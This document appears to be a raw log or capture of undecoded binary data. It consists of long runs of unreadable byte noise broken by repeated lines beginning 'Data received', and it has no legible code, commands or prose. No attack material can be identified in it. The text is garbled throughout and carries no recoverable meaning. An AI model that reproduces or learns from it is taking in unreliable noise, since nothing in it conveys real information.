ŽØl“`@g¾°ñ·)(3{zì~6åù4û±¼í8Ü{¾M¬¾ìË|kæz  ö|á\c2?Û«agæf?Hš°0í _øÙxÉ af² ÝýM€õïáÒzCs´™U2€w'2up¨Ýõ³÷XÈÃ|^¬HJGµl£B5Ì\ܟþ"قæ]l-ÞˎñPú¤ÿ"d9|¥bµFt>ÜçñɃ¦ú*ܢȏ´Óë úÁ…#Tg‘…¯€U°ƒýÖØm.—ß¡%éÁQu€Ö5Ô+²Ê¡Èf»Vå˜4©q³5ÿߑܛ¸­lWõΫr 3ña‚ëÐOhÔ½¥!,ûï–D ™«‰„¸¾„¤˜ê܀š¢-Çñ„3¯Æ«ëÉ´ñ–‡V¬H諹¢Ã›ÝÑ\~U8Õî¿ô&©}Պáe¦ìf<ðG@G¯_ ¬é*NIÕ`…]½Ly‚e‚ÇIV5cğj¨Qæl-J>C>y(8ü^ fbDD7ºy\xn¢,P¦./Ïí8•ï.;ì "±Ò«OH ¢—uWâW Ò*÷‡“:ãWgåÏ©,ÓzÃö|â]ð^ùû¬‘{¢à† êP,Ç¿ZFµˆŽjõ$%æÄÐkÒfn¹8™–€Êâÿ2ýJ…:4Ö=æîeå}ˆÊ¦—èäT bNù`¨F¦NÁ?ïžX± lÒ,A3«‰"›$jM0(U¹~-SáԈÆñèvD`—e=³ùeČW¢M¹±r‰aPÉ_ùŧhÿXbä„Øž|ít,QÌCÐ2Ë­ÔXðµGbÒºEF>²k#lLq”H¸ª±ÕP<)l˜ËÂWê+l¸Ïá¹~”® =¦gì¬ïv! Ó2Àu@߃¹¾NCþ?cU’Rð’0Yl£«[þ|Ç&m»jÁ5$"hNݺLý>Ú*y®&B:0NݦҐIG˜ïà¸Xe±UȖR•çSGœèSNô”­ „ÝO£ErŒ1d¢F†tA¢
Data received o`¦'ÖʸÐj=Éפ€ÿ 1’`@7Áõ†ó«ëÚW8h Þ[¦.6ª_ÆÐ}€Ê'M(¹/A-=^LjHîfaÂHyÙœRR#šÅä˜=ñ߄Ó)DЗ1ŸöŒlØ­ã2€ë—-ðYXAðh½˜n¹¿çºj¢¨6?)ç~,~ 6Ók#)íG÷¸h¾ûÉۊ_P{ª³´[(n}TÝ0å7ÄTlŸíoÁú‰OQޏ`ØO¯ú8x:崘6žŸ –áÂD~’yÓj iQԖÙmkuê-âk‰4"‡¯sÉcLÎ ~?%äU;[Y\SåúL7éÄ·˜‰õn~EV{b?é$–)± œ&«w°‡­yæf@¶û"ŽÁÏO¿F¢áFÙÌs[„‹ÛëÒ¿Èc´ÍˆÔ6šÕ˜…ϸëÎH¹ü4k8ÓûC3Øvïìªù-ˆbˆ+äïA喴‹–éHSÅZæ~}ýv 2}Ià¯å¥0kn Å=Øô‡9 ˆ|šú«~MðÕ:í<Çç&¬Ç\›°‰.[ÂY1B«&BŸÉ‘!œ6lÅôæk~ß|Ž£óäÄws–ùЇhâ³C¤(£×¼QÂȏÚý‚î„yñ¢DùugFɐÚ›¼z.ÒÉsv3Ñl€#1§ŠØ‰5Çv½ÀZلÀ©B§õtH9À- oLû()ä§ÌO5 ¡9î.‹±UUGj!RIeñVíìì ä­Éà6<Uð𾊱gÂ¥Qéx5h9C®/Y /ÑÑ+÷YºŒ‰bßÒ)ƒ\áãH¾Ééèb3ùyG%¥ÙHHXÝÑ·Bÿ§¹»*­1Ëi5—ZÉ>‚"VéDæ~«èÑqx¦bõ.ú7$ˆN[pΈÌX1Ÿ‚î’êU‰ ¿Õöi*)é°Kî°ÍÇLJ´+՚¦À&)•y8ö{ӛ‰ù{ V9ÑBöU&,ê/ÒșÒÂú9q½ÁhçÅyë%Ùì’îYL·Ç­å­î†®#ÛH|ò äáÒ,\Mí|76”¤`I´a @î¡‹3ŠpoC5‚‡ø¥¦XÝ!m/¯’öø֌m‡ËÞIȸ…㈘xQiùvoåjD|r­æ7ÉÃEÉô4T`ŒÚS¾S½éO%vÄÛáðz\›~ý˜¨ÄÉNšŽÈ¹,;0ÂÂÚôé-—kgL,ræÂ#ª÷륰ø¯¡Ð%ê8¨Ç0|©­?ñ·é:y1gc·¿á îo@ÞAG0RÙvâÊmsQ Òí&½’ç»Á¡M_F9iƒAä1O!ßâ¬êX»«exȱƁ³g±­Û›’ìŸ'eGB²Î&éñ3ÿžB<ïáؘþWú*îé†ÂùŒ´íﻊö°•·>d¹¸´já 0Äý‚}ÿ¸åú­{ÌÂ8u2¾)(¡‹ËèáßÀЦMZYMfaï×"LN/‡…‹(ϼ2/ÎòVö¦¦–ÊŒHzŽS*;pëb³àlÌ´ÖÇú+V:S÷n¼êí?iC`€ºyˆ?ikUê6™A(ʨ7¦q‡-<àæßö«N—}+à–HoG»È»^Ëh¬Æg»ðÆê,«f¨L]À%¼£CVìLŸ<R «8Ž4»Ó %Ó # „Ðb 5¿Lösréá_¥Í}d@íN¬œpp- ÅBìaÙ=^G1ùUIŠ_ Tº6 λ¡V‡²…br×Ú}Ƭù*Ç ÕÚi–¡W¢ú”6y nÄÈO/±œõ*RÎB‰ôvƒ›Ò³*ã6¸µãd\¹‡<K,¦×ß{
Data received ¨­+à~Š® 
Data received ú§Þ˜è}wÛÀ ^¤VJLJêîKÔ‹¡ÙEá3ȁ%iP#ìT |‚J±yòñàÈjÈjLƒ¼;ÊéÖ¹xHŽÊZº’Яù÷r~6ƒ‹EeiYÐ‘ð‡ ¥¿¶ 3ºÝÝêÊM„"f9öÃ&nšcÚôÜ–v ß,NÑ{n¢0Qzña,ùa­Í=O–Õ«ÒHiö©deíðÑöYÀb QN÷K}YA€• ©ñé÷ŽTÔP1=ý’T‚ö]{Yüý”U˜Á¶mD\Þ29r§‡¬úR&ÊKljþFصŸ2ÆÆè×eÎz½¨åÈOž¾ŠÐøöUÿŤGíX.L©³4l›Ó•¸ñ ôvWg‚r¾Ò‘ŠKñŸÙÐμm`$ùWIËA;<ä8L[Ñu‹É‰ÛŀˆËÃm§èyªÐFÇúµšGÜ!º±ê± áuþ¥”zpˆ ƒ¢ýÜ ÆWìdS‘}­¸´KQ~ZFÕµ˜÷k³NEô${šâ»4¬Ä©iã`$}]¢ÜÏúêT>.èüÑH|~8y7ˑ«q*’¦lH:qùLÿ´"ýRùÀ¬C} eN¡tÑ_ ¥rSLø8ï±KºŒRè±èQ‘þ—óWòPj÷P¨JÿÔ ‚|ß1呓.D‘្üØè#lX|ñ™ŒOˆ†c‚sêÿ¢I½8hÓÒ<Å=ëÆ®,¿ú>D¿[ìF=a®Å)Ø5Ô§|ÿÝYr ͓٦ñ@ãJY¹èXñ0£gÙ P B†®äÔP¹gÒ¼rÁ$•uڀO_£PaàüvœÝþ¹! sA1/bD-±­'5z‡ æ1— K)ó=/&©㑌 nb9&ÛĽœØj˜Í'–{Z6VvF 3–"âòJ)A†RB_¦ܖì7`¡æª•M’8GÉ:³ø}" ‹…§íå;ù¿¶)g, ãvñ¿çJˌöÙ%bŠ~„TEÉ»ª¿Þj¾Ö®%ÒE7_ÏJ:U§ãp€ÓÀ€¥hùû!:ÇI6ý´¥Ûc¡ºqyÏ@v%¬ÙßÕ AcxŸ¯ùÂÞ&ß؅AèYMÑ¥æ0~d~?1aI¦“dø<ļú Ða ñ'†‰«.Ñd/^³@ó wï¢Ùz¿=¼ýEA'&;¥¨$òáú­£È'C¾;ˆÐ&­t­üÖÀ}÷Þ+63t´½öǓ¶ÂVù9Y!K7oǧ¶±€™#@¯å%™xbÈëfF>ÚWøÍZV<`G±`°ó݂罏” v@g¬i—4˜ù¼n!(N|å”m3¦4FßSɖ•^ª‘|îë1t!¿<Ø{”‡j*¦ôüѱ§ºeq»¹5`›¢- H­Tߘ°"{d5mÉùõ+íÛ(¨.òٓ2ƒö2jí¡P›˜Ò>b“-ZNõÆBñÆ9^ÔÏ=sø-•£ ´¥…ÍK֙Ù™Œ*ô)¹ö’_Հñ¨o….xmz†l27šò0aɑï%žŽašð,æMšZr?„5$—¢è‚Bæ I÷šA€æ˜÷>R÷ ÛÙÁÿ s£8ϑn<6Ñ¿µÕa––› c% Sùà†¯Û´ ¯ùà¢É}ÂÖ¡Ò „÷¢yG…àiÊ\ÏÙ»U> Š™ágÀnŠDšÄ’=iŠò\„.ebhŽKûs××øotæ÷{^Öeª·¬HMª)Y] iÎ\^åïÁúBm
Data received ŒêMëø÷NûáܸPӀ¡Q.SÆÙǀ–ÁäHÄà–§ø³½ñý6Èe°¶ÆNñlBÙ Ór§¶.Ÿ{zvWgΛ ùnæÐgce'8±œÉ¨iQ®Z?“ 4À9Öfø¶˜1ú\‰fb!0|—‘Åt·½D¸2ÕÞ8ðq.@᭄î¼(ÔŽ²»A¢›9¦5íRr¤®IA E^ëkµÀÇùV.IÝGÖî-ì5‰næC BÝ {|¥ª,0ü̸lNWÝxÐúfæ›Ê%™EÃyñ‘i–®¼Y“‘TÚÕ7Kƒ×‚ó’¨×—±RË»‘¥û©ô¨þ9ì²ÒéNŽÎƒIŠÊٍ€ÅE¿æ!ݶ"·´EnÃ?Ô~Ê jn”=¡¿`´¶í¾úݼD A]1¥jGnΓ±ò¦+tÌH‚:âã¾iŒC õ#Ä˱ô­p{y-å,ðÙîΝy®ÛÙچ°a†Yb•Ûزº]ćaZ;g¦ÁÆåñ(ó•#ÄÍï[©Þ:ØNË]à}N,Q³„l6»ži›&V»Ã¦CÝU× sA쩂š‘õ‹ {—Ñá%ÿ*èÚ2å,ےiLQÒeP¥ì±3{˜Êg8ô·e€¨8íÔ )T­ŠÅÿ;‡¾Gt,€¼-ù’Ñ6›•ÚÑÝ=œ œsZßo&}h„B·eNF-—M£E4[;7Ôߤa‹ü™†'Ì|²ÇT© Ֆ~ß5B!8у×}šR„>°¹Û­BèÚ~ï/õ®ÔÐâptA\ÂZç–ØÜA5¥ëá”1´ÿߨi¢j;‘ë¼Åi?“9¯ù<{¨”ÿðî³c²xx‚…{}êô^k,XXXi(ÿRsŒ©äð·F!R›Ø'.^n¢F'^x&Àá¿Cý£Ð¯ÌçYór'ÈAÙHÕ(^º šÔ+ƒô4¨‰CLÄ2n¾Uݾ‚_ÏM‘4#§ë$ß¾ùI.c»X€ð'§ÔÀË' îïÚû=jý ñ¶¢Æ®>†h˜Í³*—‹î ƒS4 ;ÝýÿÚSþÎm¨¼OÖìÈ^©þµnDŠ„~Þc S­T#œ, ÔÂ<ÎTÑE jÓ9=ˆ9ûе:Ç_‚èÖ7»<ÎM;»I-Œ"Ï"Á p© v¿º4Å/¤0¡/²9ô¶ËÆ]@ˆäÑåñÇýÏÐo{«í ƒ÷‘‘ïq=kb쇤÷ 7~¶ÿe|5“˜ ×E½}A6GÛ ¤5L’¾3[RÖãû …2ëƒrhÊÛ åÒ6s$Î œxŽ™ џy“(»²Ã—,OŽkÙå{ëϹ³£;ľ–¸jc%BØ~¯±tgæ ‰ 7´f· )þ¯õoOרj;0‹i?Z×–YŒ*ô/Ÿ©:˜DŠlÀéñy/CŽ6/}ÝFžU‡,·¿|좕cÉ0'¥lÀ÷„4õñ 9·°nî¾w¶hÓß«ƒFm‰Ñ³Q(þ»$>¦aoÔ÷=Ù6LKHu<ié€ eߪEkœnÍf"Põ-ðxôHÁ;Š«†=°{ïÓ+KáXƒœŠ~àï[?ªƒÒÞD薑•Ú6µ@«ª9§Ýw|¥Ëtä‚{è|§}×_é-G.Äy,fO:-ó‰U«§OiI±kEÂÒÒò¬;0³ˆ½#Œ°C3œ!iÇÇ®¯á¨ýfÎûM¦M@ AWŒ„—j~ ™Rf¿d»OÏLl)»lcܹ}àæٞu¨Ž]Zº7³pçT4™¦p}rÙÊU*ü[>ýñ§—ÿ¿
Data received -äâFwùÿvÔ0Ø¢xhS—äþé‹lþèÂnIlö|k~TêãþÎw
Data received Ā^à+ÍÖlç¡íRâ[î𞴠"ÊgBw^Íãi¢ÝŽ cÊ'š|—TuEvõ[C Î/ö}ÒӛÕÇ ¼Î¬÷\û¾HKH–1«É«þ$ c ÷ǀš&Q}ž×ß1¸ëÁU¶f¿“Â&Üù•O9˜—u…Pp(™™&Wßv ¾|š%{8èœà%™ÎäY®“¯¾Çhx‰ÈRÈFÜ]¾Cšvm£w«Œª³3§åñ´òY†¢ÊÞ[ôSs‰GwMýE[‚α಼&Κ}ñÞ¡m§ÌÐõñá;~I’ðHßËCùÞ§DqdÉam柕徜1õÿ0£Pþo)Ô °¸áP‘‹oÚ iì4€\häþ¤îø‰ßò¶oÜÝ{$ ul™~7ÃÌ»#MN º¼Í™Ž!v«µS…8ÑçQeš¯;a«JU3kbÍß!ÓÃO^î¢¹·ª¬S—u9—>×K¯ ç6zmÒ{ŽÑ1c²Z3@ÚAmB©Õ4U0 IÆ+™¾W˜ÊÞíU˜|¡¼ä`ÿ¬®Ð‹6]€(b¨Ñg›G³\ÔKñ¢EòjÓcñX°Lõ 'K͆È+yõ°V¼/%tõ$ôôÆ `&àDØ A8°¬ð¡Ð„~R¨0¶ÌÙw4`Ö[*éöóÝ¢0m‡Ú„½× ²€'Ȧ]-¦GîbuŸ#ÎNv^›gՄ.ÏÎÁ¼O´Iýóè´¸‡Nó Mˆ<¾ª†lʁ¬öªˆV¡¢xfå=Z”h¼ÎJ7w~XXΗÉN²»Œ=ȶ ¡_æ?+ÏP Ó÷(­¨`” d´2Æ£©€)ÿ‡ نÕ> ¬<¿ã;5‹•æèP5I"*GO±M†—I:¨@ö¡uFeuē¾ušrKWòø7·­E"V –+ïêrm&3åïþcæÊ1­¾÷³cEÝà LM#[M 3ËF·7à¡]xkú”‰TX؝pj¡£«•Ö¯€+ø7êü,­ûD•!TuAz#Z»q wØϱ¹Ýžîqow«˜êßp>Ý|&!RèÛó¸ ŸqŠˆñó /gßÀˌ2ïˆ ¶ø3Õ5Š*0péï—>˜Â¾÷á\ï{àâ3çj–Þú?ý½¨6°{ÏøtîChŠãCJW öíö/`Ô÷dÞÎp—”þÆ4„¦êcL#@yJÅ°ðl°Õˆc~Ъ»sŒêëa)M·£W³mÄòÎ#ñC;_èÜ3çÈRꍗíœ5^z£!ßÐSŽnÔ~}O»Q¢xý×nn^šÉ®Xù<i¢¥!ŒoM;ù‰w4)"IOìÞ@Ûm."à7㦜ðI!®YÅMüŒËJÿK0›AJgh£‡>˜€òm[(ùq„$”ÖVQ­æHŒý÷[pì Òùê²Ä§ñ+™ñ¥µó—˖ѱYԄƒE[ª~Pº‰Ô/Ìû+Ï[µ*Æ ­ƒÝ¿’¤v嵚ŠCÈ:^ÂÞðƶávkÃô|1®)yîØ"Ýnº¤½²Ã¡ô#ÿãüâ }™þfJáU_U€7{µÁV8®ãåΞ,Í1͛æØRß它 ÄþÅö½Ì»TƎztzºXkjGæLÙ®‹´®ŽY€ò<ÿ·´.O%üâÎʪ ˜v³2æK†§÷9Ú"ÙabAbk uq<֞IE,*×LZ;é[‚%ìJÌES<
Data received Ï·®ßR~åç¢s:þýÜe ™´_yyfñ©’=ú(ð'Žÿʄ3’‹û(^ÙâíÀßÚakéÖ׌¿»kŽþâè¥Æßâ(Óý ×Ó$‰.Ê{ˆ*aÞü8Gï_ …'0‰4ÄÚª7/´i’Ì «O p¦x@S]é1 ÈcWÙ!K'‘½|¿ÿžq'÷•[xä¡a¿-]âϚëªè{$7ãƒU‰É‘-P;¸ŸµgüMR×,Œ¹ù§Aˆ`'»«N  nd1MÜúøæ¶>_nŠÑmæGª ò„?džæ:šâû–bÄq‹ÍùG힓÷==åKO®]öÍ•Ù)zÉVM/³¬‘JÑ1&õ§•›ösìÇaœ¦‚?Ÿ0v¥’ôE.¶€£!²®ŸH‰ˆCYvHy¿8¼ðå•±ÖІà¯-Ƙßr9–Ùñ¾Ýî{ÆRžk”£Ý8šT;è`úßÝÌW©øtsHÇ*X:ƒ±kõ1ú¹¼×¶Å–ÍǞ®û<аa+/Å[HæÀÈý òreT‚`çý£¥k*Cz‡Xfµ¶¹ú&Ê§k)ôwÞÀ†&@È ‹‹0 ð@ZÔ+´>bšeGù™dŒ•‰Õ^†)í!N êÿÚGÁs`ŠÅA$ýÍgr†"1h'Èzyä›y9bÙ¼!A¤¿‘še^Þ MKÆ_þè7“fßüöª` 3eÿÊ&Æh£Ì5y|f‰ìÑ^:GýÓqôŠh2G z‘#ôa*n )þőñ’¾bNä b`9Ú®<“W¢\F-ŸyUÍ<xþÆú"q³^I’OákuΙ Ú67xUAJP:CÚQó:í‚:ÑÑv4®„ZÄ;ÈËà…©}Þx‡îHbÚàTâjü©ÕˆÛ*¿@0òG>Ú,¥žõf(6þ\tŠ¨|“|fÚêƒkU˜&¡ª»¶@¹Y¶õ"À'Rèܤù׏Ҩ³E¡ˆžñW¿£‹yBÁâð8fðç̒Ý?1ɾ¹Åf8 ût=$6oZï2Vvæµ7¤ykáµÎE³³Ô.¶þ2¼72jžHÿoߣ®¸—‘‘wÚ¤K}º³Û“‹áØu‡uþ¬ R“—òjQâ2Ëz®ˆÏN!N žHûëÝbõˆ u¼ HÎ׏ïjB[´±Â͌ؗÌïÍÿd‹Ôd Â¥3S“nÞžCIƒÈ«°ˆ¹º¶¹·WåZ{Ù+íðM©‹ak=ž¯„Õ¥¹‡Uuâû!Ø!É2Λ!¨3ü‡¨YD2åH‘©s ÚI¶DJ ‰wµP ${yË®@Àò0ä¡£0À¸ˆö©Â…üLÞ ­½Ý³·ÂH4*A˖m´)”¦#‰X6¥‘JC2Ïz嵬z•=+o,;ˆÄSÂeƒ0$Iß–Û$O¹ÈÖoJ@L ߝñ­ «q(Eio(:3ôT¼ÇŒrb¨³¥ë!#^TZ—UJÊîdO ®ÔÇ¥(åR§ýρCaësݵS`|9or¿õRé9ÛõP€žßS·Ñ)%íÒèöy„Nñähï!*lT95y‘êR§ãûÕZ¯óÈ;³¬éB¾Û•`îò7—6‡rÊýRNažW÷U’áæ'²êëôC3jM»ŽØntùã}Yf„²:žLW+#!‰Ç܋k‹dùñ"vb)]Q-œÏ*á¡@øuì²ÁQ‘)±×´ ƒ‚ð?±ˆíš|:¡BOéoBoøã/äx¬S"ùÄ øSZgZ.‹qé3|Ùcƒ¬ÅcÕÈ?›\ÈKÝHÆ
Data received …k Éð•?RçVèËÅꏰ´x^V©Ð)°\’&ÌÔäUô{ Yðn0H'?â¢Ú’lc §Cyâ’`'CR7óôíM
Data received wÁo<¶!Ž]°?4šÿ`†`ã•uøÔ*¹”DÞÌîaö~[f~6ÇgOqŽŠãÄ°ª¥Ùòú‰Œ°&ž@V˜£:mΆª½·v»ë /Úße~n´EKQÂð7’Ò%xäˆk!L½m€ÑØ#BêIÔÁúX+kc6õSî0'$ú› g0³Ù»5Þž6ê'"Ÿ®4Fßd!,cèÈ{o¿° Àªå/Æ󌧀¿ï6|-— …æ.Œ3ë•ã'|S«›Yý_-eg•¹ÔE>°o0ï~h—ØÔ +n›‚ü o}ã]ÀpMFŸØœsú yaݑ—3cû‰ÖDþ¥í.˜\ oÞ1RÈÔm³9¥¬ÌRÑË*éçm–èºS³mý&‰q~ˆÖ[NºkDyŠú™†åfî5Ž“)ÀÙåT\JuD˜R:² âÁ­‚°ì=véå;'¢6Ÿï‚†·¼„Môà»¶˜¶°7°-ÁÁ1‰@çƒwd‰§ñ‹½|ƒäG¨§ø%@‹%÷;³h-˜b¡•[…È@CĘwÐcÿÍ°¢ìW¦ë‚Ë«bïÜ¿\ `c¤g¶ Ï$O]¬#Ê)f6pÇø§ÛZ kéW’¬è?ðÂ¥»„›þüp¤Æ#–LªÞZ–S<<'!¼´Þ °GU~ýüY£°ìoi„Hā±Ùžôç‘õ.5£&ñ¥„—téüLû1S¾+ç-ÑÊ,ð¾h\ŽnçþÿúÑäytg¼”cw›¡/:ý{öï"ãZð*O~W²'®|ÂG:e Tß+sÈu¾Mç¤õ¸ –CN¾¸ïÆOzÄCÓâ+_Óê€R²%­*X×1¥M>ØN¡BäO=׌¶ï&ÃaÌÛ± jaÜ y@Ž±ü^e5µÖíUÙ¥NÛ(!¸–‰!kïÊÈ>•ld'–ÛÉصz{úµº)&?Kèæë†Þ:¬¹Ú5…—Ó6½øqr=ØÔÏ7Ý<ßãñùUttQl=ż½ÕÑ è‡Ð‹aR\PÝîüïŠú¢Ü·k$Ök ²ÅÐéÞõÙXd@ô9%PÌÈ0½,1¦m:Ͻ,oý,tþþ³­hƒäšó±o%ìì%¨¦<à̊ŸÁ?{6ïŠØ-3bhl³ar=ÇýyÀ`éTârHH›%5Ãë}ç·¶÷˳=˜2 q?Ø،d¢ ÆxÁc\2ƒ ’NoíµuǓº‡Å\WùÆŠNSdQ„Îüë‡ORBgÃÖ¦8h$ 7`kZ‘šQ¤JÿðB;±°ÆyE¯ÛEÛŸÛ›üáT`˜´s­Ù MríKÐMÔû®úZ* Dæ؛J².C_ÆïÚgrÙÙ\:øφ!*g’× ã#Á§eòËZjImÀRØGLð¿1Luy ¶ÁJÈÕH­säeüv+À¼quF‡ÃFËO¤ãIoÄ|J›M|Áb`VØË%ö¥É4WXC%^x2â'ˆÿEÐ4º‡…"æ4 ¼0 ÈRê¾p±,µb'f“0ׂ_ºÌéqºkÂXðÆzD#ß¹‚õßMúÙ)‡mLo; ¹ë‹IÝÓƔb!J¦ì <Þ·¬Õ{(¶û‰¨béKË{åæýE‰»¶ä÷Es$¥R—TŒñ®Èi±õÀðtºü‡R¸ÏQÿ½®l| ÆëðœÂwÀ÷,-;Ä=æ× %¼TÇ1L5û.B)Àþ
Data received v½í‘í®ZZ‘`”C’ÉüVZG³ø­6äôû¬?9Â߁ÈëĘ£œÛ:h°õk{°Q#vŽ#eYÿ¯bH›âðkI,üD Q\aÕníÓÜD“–Ôt@>Q¨NOü¨ïˆÏéæbôK#¾…ªÕ9oÝ#͍ù\ƒh5MBg%ðƒ¿NY0B„‹³ù÷U‹fùðœ~– À.ã½Z+“×E(OßR®Àº’'xÙe¨¼ê<¡ jnC!+0#¥ß µÂ¸¬ùúUÎ˟’Ä°½çîƒÊ"g¼jd~I61;ùˆ'èýµÚ8ˆ.§…/0ï»àc¦Ìö+Ÿ<½Ý×/Ý)x.šË]ºùp¡=×boCO…T5–^؞ŸêY2±tne£Ñ¤/ÓeY펺9Tü‚اnÃÉ7kñ¬áꭜlPLa®îªä ©&T‘°i„„üCúq!Ï~i&&æ6,Øô¶(ƒG݌(æî‚qïD5츏ç¦EdÉ¥`‹3,×éjhVà»{éx±x‡ÃK£ýxªH+¢çÏ-p÷†€uUÈ4Ú.R¾?’ÿt»k9·û×lªö kϵX?8dőiäå‘CGXÑ?‘I®~»#J!•ºÐï‘&žv ÄP˜å™»Ûí¡ZﮫK÷‰mtˆ×ôAхàlðø‰‡«e¥ÊÝa“Ùô*?ÜÒ3ΊA—æ„푉ÉĄ̈yíCklàB`Šty¿'åñ‘]´=¢UâÔš«¼5!e¤ÐóÑkå#Z£¥Ç`­KSyÎFKeLÏü›Ï.R„’ôvÅ{¸°°ú¾bY£ʟ+{˜êvÍȗ$jJ37 Ê õÁY Ú¬±qTh…tÍ)¹·´±å. C‚ƒAXE¤Ý8o„Ì¥±á˜ç¶SEãlX0hWù;#¥ òC¤ÕÅ#hdJ4Üä˵gê~“ӌÑJ™ÿÉ×½•ƒ2Ȳ%ºÐÙ"ˆí À>¥­ŽNu&Uë|}{Q¨‚*¹dC³MÔ¿œ˜*kãW°éÑú\±Sù‚³m :Gt‰IŠ€E,mXyø> ¨4O¹[y–HŒ¿‚:ïÃRùÏG…Fˆf+2”N#³ó§ÅnºÚIá¤Fj w‰jÝb.ÉÎþf½Y±<}2úèLÄò)€ùÑ¥O£M0#Ø*ý4¼­íNØè7©„…£ׇ׺ÃP>²èiµhé+:K‚'w¨À ¥t‹G«fOp¶¶Ôw,EwoÝ¡£Ï‘jR‰ bÁ¨ÓÌ*­iÆkÀùÇÑ\ÉÂWKþVˆ%ٖ` èî¨&É9G ®F\|lXPÔ\2RÆWºž*s>[À1Æ<3e}ߊÚU0cµ7/Óq’Áxò5®(Ȓ2¢ð>|²½à>¦ûÈ#3«Æú5øP¦šcUSyšN  ìñDf}œ eþa±.×X€íukQVS«b%9¾×ÊÝãúö®o;ò…ˆÎæÚé·»¦îB0ÆÚրÇJ»‡…Èîó@5ϕ­ú¦àIhþ(ÝŸz.Psë |T‰*ñâ{7 Éù|Ïê׳ŸåŽJÅÛ6òIÚÎxIt”¤¿ „±^LÇà´FçðøPuá&‰úa1ûè¬cr¨ò>Bî3>º·bd1ٚ¢  >ÎㄫÅ. =ΧCé|XR”'ID²`Ǟ˜c‚1G4Ý;òäç¼Ü°'Žìm ôØÜ7x¥úñ²7…ЮdýÎêö¯Þ­^=˜µ{†OìK¼YæiŠÿ,|º!
Data received Èèæíˆ%ðÿlÐÒàܔxÒ®¬p•¶Â<Ç "»¨h¤ˆ°”PkP•¾Âê IŒqgµ9·hµþ:£z@»Eϐ†Ê®¶rêbC  Ëi6Å¥µú÷Æê`ÒLÎw³ÖÍ
Data received eû/‹MEߐÁƒæsĞvEÉkà\¨óüø*¼WˆNòx¿¡3«£š£X"|©¹Þ°ôme“™œ’H©²•2ÖÆ0 à0›47Ðãþ]ÜìÅtï¢ä…Ʀ˜ƒTž¬]àGÒ|»[‘ó£Ñ!¤#d ükÆÙë¤ë˾’ü^ ²øוn<DZ[RE™ý ´ñ¡V"´‹ZEÙ(Ê0WÝ»[öüj¬‘‚屨ÜØ&³]Ehí»_*PØÊÃï“,o§‡¡\; ¢eoo¦]ILHz›HYM¨A¬­Ñj,ã>½ò!eÞ ø5‚Q:I)2®%8°ß|ÐuX•.Ÿbû6b,Õ\ÂPªMó<ãx›AÎ)÷3õfŸ+\ÔfERüîúDà/Ðç@^r¦”VE´-ð©ÛQ‡a…󧻕1†[2S°YF¿}é ÎIئÉ.€&L+J£¸‰É3äPû_çɧ9ÏQC©:³úyc%IÀ“ Fáð¯Ap£«†‘—^À²*ÞþcwE9þ×  aàÌEØÓ8È¡i%ìßµØÖÿ©m”­éž˜2®6H©ˆÕØ®6@*Ïžë —Ï¦Vš?G˜Û…Ÿ¬¶kiv|é4S ܺQƒ¡™SNÒgSë’®Ã*32Ä*xlˆ†]éã%KŸâèxohÑ¿ÒÍ|­T¿Â£–‘Ù3˜ZÀùWÓ+/&&3 ì-5wðlž*âå8øש7µ‚övƒv„Ëú/­ äáJPÈN¯ý„_GBXq}¬IvtcŽô<RçÚ>üVÀ~! ¬)jS¢7CòpýUkI|ُÀWÓ¸g÷¾»æq뇌(Ս¯ ÑŽÌ1„K 6ŸÐT.JÍõŒ¬_pzήٗ!øT·D^þèY‚¦<‚£k•Zžâ¸Ãõ“{[÷ ѽ_¢?ýÿ×Â3í=z2m KublÏ9muòåÎ[‡¡zê²< `—˜ô²ÓËGÀtïíå»îªÑÀ§*ßf‰òÉa¶òbœïSÍþ³î÷¹il,­"ÅN’R/¢p È똡\‚kW:²b&æõ‰:3é±_.¡Aëe[«XŽ8tÜ:]·X"æ²¾Avts‹¢%†t¶¬L]` å.ððF먌ªÔî‹ô40vöö×v: b«V'Ç<|šc‹ª”VÑ=ÊìIO|=«¢Ëƒs¯ á٘;¶O²:e±–v‹†ÿ©‡{mÞ¡³û¢Côں𼝊j?îA«5ãkbÐðÚ}8˜›ëŠëNª·çD6}U«fW¸µº¯•‹ßèsÜT7Åâbq*÷ò]ÍðÊA_Ê%]¯÷Ó äY‚e|¡´›!°\Á’1 QrϦÿ‡Ãàhýf‰Î•Þ†Ì} ›â`¨l”@¯^õ»4¶ÎªíS‘‚ æ¼ ç&Xär¼$Pþì!LG¿ ú@dt+¬„ÝÂü‘ ñ›8%¸Ž&[%¿´. ØeŠ9<Khw“7€— tì³u –Óü¶pFÏ<máx¯Ñ{)”W°1%*¦ ®YÔMŠ’ÚÒXà–¬4å8,$©2vùA;º–ï_FÁ÷¯DýÚ¥ÍíwuwõY‚§Ü…­LÿU¬Õ£¬|¢¨,!=wmñÂý‡&6³
Data received @Žð𲰞n<!”;dЇ“y ~ãˆ0R "t´cy终ײóßãne*wßêY/m›b mÈò+¦#¸·šM Z¢ o|bÞ²‹5ÍPûÜD´„ò!ɾ“ÝÊÇø›ÝöÔ\“AŠÏ{‹LAª¡ë™ÏL‚e<ö D9Â$0H Â{ìI9ÉÅÒÃð•ÃN#-ÖV€ôX‡ƒñogyÔ¸0æhc>½¥…1\åJRÞµÊîÜÌ ¼Î͖ë+msºÔë‚å›:UHÑ@(·TÝqòŠµ‡'î,Uà[(/C_ô=—l†­*kn¡@:uH:zF„µ¹ð‡ž¢üe! ¸Zqªf€௧°„'ô_šÈ°cˆ‡êüžMKÔHÜÙÐ>ðÈñëvÌãQ‰q=¼ng¥ƒ#¡§±ôç :‰¼oéHd4€!=O•=D™í€±é ±½î˜[éVxÓ^bkc¶UªfÝhüG§-KYœTÝJb°ØSŠåz«&ÒëZ¼õ`?25,rm¼ô8š©¹%Àâ2qèÓ¤_nïí\4–趯 &½gtNÆøíeh=¨JPGKMAÐU=o®&ךŸ\¦§(½‡ ±ÌââP َ@Ýêf¡¨[¶X=úäï$º¿YU.is})=YO­@Ûyüà)[´lC_ÿjùqÀҍœnã«émöå7+£f<wäÍöC¤!$J½®Ú+†ôš aà$¡Q1Í 9øåg‚þ»«ýÄô™ýª â %õtéÃéâE Õiˆ@úÉ$j„¤3I…žÏ)7¬|žrð07maœi€FºzuKlóFÌÓåòâ.œ†¶6{¬Þ‰±*×6-]>1®¬œÇK‘:ýŽø2°íùãádB¤$ú–È€=! Po®âyõ&ûűæw‹ìatÍ5„÷± æœìføA¾_ÖßECA-NÈÜçö™¤‡ª<„/W&žÙ­i+Ônð¡+¸Z›¨V]ޘü ±Hæñþ€G©üŠ.¦Ûª´… ¡Lˆ®KPÂîN˜³ðçeÐ÷ææû :³©/켈_Ô»ÒNí ÞÉzB"cƒóöˆÍL 